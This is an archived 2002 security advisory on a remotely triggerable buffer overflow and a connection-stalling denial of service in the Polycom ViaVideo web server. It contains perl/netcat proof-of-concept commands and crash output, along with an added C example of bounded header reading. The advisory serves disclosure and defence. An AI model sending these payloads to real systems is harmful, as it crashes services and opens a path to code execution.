[NT] Security Vulnerabilities in Polycom ViaVideo Web Component

From: support@securiteam.com
Date: 10/15/02


From: support@securiteam.com
To: list@securiteam.com
Date: 15 Oct 2002 04:41:37 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  Security Vulnerabilities in Polycom ViaVideo Web Component
------------------------------------------------------------------------

SUMMARY

The Polycom Webserver is a component of 'ViaVideo'. Two security
vulnerabilities have been found in the product: one allows execution of
arbitrary code, the other causes the product to crash.

DETAILS

Vulnerable systems:
 * Polycom ViaVideo version 2.2
 * Polycom ViaVideo version 3.0

Problem #1: Buffer overflow in Polycom ViaVideo Webserver Component
A buffer overflow in the way the server handles incoming GET requests
allows attackers to overwrite the EIP register, effectively controlling
the code execution process.

Proof of Concept:
perl -e 'print "GET " . "A" x 4132 . " HTTP/1.0\r\n\r\n";' | netcat 10.1.0.1 3603

Error displayed on host:
OS: Microsoft® Windows 2000(TM) 5.0 Service Pack 3 Build 2195
Version: Release 3.0 26Feb2002 3.0.0.144
ViaVideo.exe caused an EXCEPTION_ACCESS_VIOLATION in module vvws.dll at
001B:67302ECE, CHttpSocket::ReadHeader()+0226 byte(s),
H:\PLCMBuilds\ViaVideo\WrkSpc\VVSource\Web\WebServer\HttpSocket.cpp, line
1092+0002 byte(s)
EAX=41414141 EBX=03D491C4 ECX=03D49190 EDX=00000001 ESI=03D49190
EDI=03D4A1E8 EBP=03B6D3F4 ESP=0586FF1C EIP=67302ECE FLG=00010202
CS=001B DS=0023 SS=0023 ES=0023 FS=0038 GS=0000
001B:67302ECE (0x00000000 0x00000000 0x00000000 0x00000000) vvws.dll,
CHttpSocket::ReadHeader()+0226 byte(s),
H:\PLCMBuilds\ViaVideo\WrkSpc\VVSource\Web\WebServer\HttpSocket.cpp, line
1092+0002 byte(s)

Problem #2: Denial-of-Service Vulnerability
By carrying out the following sequence it is possible to drive the CPU time
used by the product to 99%.

Proof of Concept:
 - Open up several (4) connections to the webserver port (3603).
 - Send any incomplete HTTP request.
 - Leave these connections open at this point.
 - Normal requests to the webserver will now fail.
 - CPU utilization on remote host (Win2k) goes to 99% for ViaVideo.exe

[jonny@loki 15:21:57 ~]$ perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &
[5] 2140
[jonny@loki 15:22:14 ~]$
[jonny@loki 15:22:14 ~]$ jobs
[1] Running perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &
[2] Running perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &
[3] Running perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &
[4]- Running perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &
[5]+ Running perl -e 'print "GET " . "/" . " HTTP/1.1\r\n"' | netcat 10.1.3.54 3603 &
[jonny@loki 15:22:39 ~]$
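Both problems above live in the same place: the routine that accumulates an incoming request header. Problem #1 is a missing bounds check before the header bytes are copied into a fixed buffer; Problem #2 is the absence of a deadline for connections that never finish sending a header. The following is an added example, not Polycom's code and not the vendor patch, showing a header reader that enforces both controls. The buffer size (4096 bytes), the idle deadline (10 seconds) and all function names are assumptions for illustration; the 4132-byte request line and the incomplete "GET / HTTP/1.1\r\n" request are constructed from the proofs of concept in this advisory.

```c
/* Bounded HTTP header accumulator: length check before copy, plus a
 * deadline for incomplete headers. Added example; limits are assumed. */
#include <stdio.h>
#include <string.h>
#include <time.h>

#define MAX_HEADER_BYTES 4096   /* assumed cap on request line + headers */
#define HEADER_IDLE_SECS 10     /* assumed deadline for an incomplete header */

enum hdr_status {
    HDR_INCOMPLETE = 0,   /* need more bytes, keep reading */
    HDR_COMPLETE,         /* "\r\n\r\n" seen, request can be parsed */
    HDR_TOO_LARGE,        /* cap exceeded: reject without copying */
    HDR_TIMED_OUT         /* header not finished before the deadline: close */
};

struct hdr_reader {
    char   buf[MAX_HEADER_BYTES];
    size_t len;
    time_t started;       /* when this request began arriving */
};

void hdr_init(struct hdr_reader *r, time_t now)
{
    memset(r->buf, 0, sizeof r->buf);
    r->len = 0;
    r->started = now;
}

/* Look for the end-of-headers marker anywhere in the accumulated bytes. */
static int hdr_terminated(const struct hdr_reader *r)
{
    size_t i;
    for (i = 0; i + 4 <= r->len; i++)
        if (memcmp(r->buf + i, "\r\n\r\n", 4) == 0)
            return 1;
    return 0;
}

/* Called by the event loop when a header is still pending but no data came. */
enum hdr_status hdr_poll(const struct hdr_reader *r, time_t now)
{
    return (now - r->started >= HEADER_IDLE_SECS) ? HDR_TIMED_OUT : HDR_INCOMPLETE;
}

/* Append n bytes received from the socket. The check is written as
 * "n > remaining" rather than "len + n > max" so it cannot itself overflow. */
enum hdr_status hdr_feed(struct hdr_reader *r, const char *data, size_t n, time_t now)
{
    if (n > sizeof r->buf - r->len)
        return HDR_TOO_LARGE;        /* the check the vulnerable ReadHeader lacked */
    memcpy(r->buf + r->len, data, n);
    r->len += n;
    if (hdr_terminated(r))
        return HDR_COMPLETE;
    return hdr_poll(r, now);
}

/* Scenario 1 (constructed): "GET " + 4132 x "A" + " HTTP/1.0\r\n\r\n". */
enum hdr_status demo_oversized_request_line(void)
{
    static char req[4200];
    struct hdr_reader r;
    size_t len = 0;
    memcpy(req, "GET ", 4);                    len += 4;
    memset(req + len, 'A', 4132);              len += 4132;
    memcpy(req + len, " HTTP/1.0\r\n\r\n", 13); len += 13;
    hdr_init(&r, 0);
    return hdr_feed(&r, req, len, 0);          /* 4149 bytes > cap: rejected */
}

/* Scenario 2 (constructed): a well-formed request arriving in two fragments. */
enum hdr_status demo_normal_request(void)
{
    struct hdr_reader r;
    const char *part1 = "GET / HTTP/1.1\r\n";
    const char *part2 = "Host: viavideo.example\r\n\r\n";
    hdr_init(&r, 0);
    if (hdr_feed(&r, part1, strlen(part1), 0) != HDR_INCOMPLETE)
        return HDR_TOO_LARGE;                  /* unexpected; surfaces in the test */
    return hdr_feed(&r, part2, strlen(part2), 1);
}

/* Scenario 3 (constructed): the DoS pattern, a request line with no
 * terminating blank line, left open. The deadline closes it. */
enum hdr_status demo_incomplete_request_times_out(void)
{
    struct hdr_reader r;
    const char *partial = "GET / HTTP/1.1\r\n";
    hdr_init(&r, 100);
    hdr_feed(&r, partial, strlen(partial), 100);   /* incomplete at t=100 */
    return hdr_poll(&r, 100 + HEADER_IDLE_SECS);   /* nothing more arrived */
}

int main(void)
{
    static const char *names[] = { "incomplete", "complete", "too large", "timed out" };
    printf("oversized request line: %s\n", names[demo_oversized_request_line()]);
    printf("normal request:         %s\n", names[demo_normal_request()]);
    printf("stalled request:        %s\n", names[demo_incomplete_request_times_out()]);
    return 0;
}
```

A server built this way discards the oversized request before any byte reaches a fixed buffer, and its event loop can call hdr_poll() on each pending connection so that a handful of deliberately stalled requests are closed after the deadline instead of occupying worker time indefinitely. A per-source cap on simultaneous pending connections is the usual companion control.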

Solution:
A patch has been supplied by Polycom and can be downloaded at:
http://www.polycom.com/securitycenter

ADDITIONAL INFORMATION

The information has been provided by advisory@prophecy.net.nz.
